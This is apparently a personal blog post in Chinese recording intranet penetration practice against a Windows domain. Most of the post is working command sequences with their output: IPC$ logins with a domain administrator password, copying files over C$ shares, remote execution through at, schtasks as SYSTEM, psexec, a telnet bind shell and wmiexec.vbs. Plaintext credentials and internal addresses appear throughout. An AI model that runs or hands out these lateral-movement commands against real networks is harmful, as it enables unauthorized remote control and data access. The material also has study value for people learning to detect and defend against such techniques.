MENU

内网渗透学习

August 11, 2016 • Security

一、IPC$登录以及文件的上传与下载

尝试IPC连接: net use \10.33.7.75ipc$ “12345@12345qw” /user:Administrator

出现了如下的错误,很有可能没有开启IPC共享

net use \\ACC-SRV\ipc$ “bk@12345” /user:backup
System error 1312 has occurred.

A specified logon session does not exist. It may already have been terminated

已知一个域为tiv且已知一个域管理员账号:

net use \\10.33.7.75\ipc$ “12345@12345qw” /user:tiv\Administrator

连接成功,提示如下:

net use \\10.33.7.75\ipc$ “12345@12345qw” /user:tiv\Administrator
The command completed successfully.

文件上传:

copy user.txt \\10.33.7.75\c$\
copy user.txt \\10.33.7.75\c$
1 file(s) copied.

文件下载:

copy \\10.33.7.75\c$\user.txt user.txt
copy \\10.33.7.75\c$\user.txt user.txt
1 file(s) copied.

二、命令执行

2.1 计划任务

计划任务之AT命令

添加计划任务如下

copy test.bat \\10.33.7.75\c$
net time \\10.33.7.75
at \\10.33.7.75 19:35 c:\test.bat
at \\10.33.7.75

test.bat的内容如下

echo jjy comes here>>c:\test.txt

计划任务执行之后,可以在c盘下面生成test.txt,可以下载回本地查看。

计划任务之schtasks命令

创建计划任务

命令

schtasks /create /s 10.33.7.75 /u tiv\Administrator /p 12345@12345qw /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\test.bat /F

结果

SUCCESS: The scheduled task “adduser” has successfully been created.

执行计划任务

命令

schtasks /run /s 10.33.7.75 /u tiv\Administrator /p 12345@12345qw /tn adduser

结果

SUCCESS: Attempted to run the scheduled task “adduser”.

优缺点对比

at命令很容易将计划任务安排到第二天去,哈哈你懂得

schtasks虽然强大,但是命令极为复杂

2.2 psexec

psexec获取半交互式shell

笔者利用msf反弹的shell没有执行成功

psexec \\10.33.7.75\c$\test.bat

失败原因

psexec需要对方开启ADMIN$共享

而且需要安装服务

psexec退出时有可能服务删除失败

2.3 srv

srv获取交互式shell

笔者的srv.exe始终没有上传成功(不能复制exe文件,或者有杀毒软件),导致使用失败

at \\10.33.7.75 20:09 srv.exe

telnet 192.168.32.53 5188

(书上说端口是99,我看了看~~~其实是5188端口)

本地测试成功,获取交互式shell

限制:很多win服务器没有开启telnet客户端服务

2.3 wmi

WMIEXEC.vbs获取半交互式shell

cscript.exe //nologo wmiexec.vbs /shell 10.33.7.75 tiv\Administrator 12345@12345qw
Archives QR Code
QR Code for this page
Tipping QR Code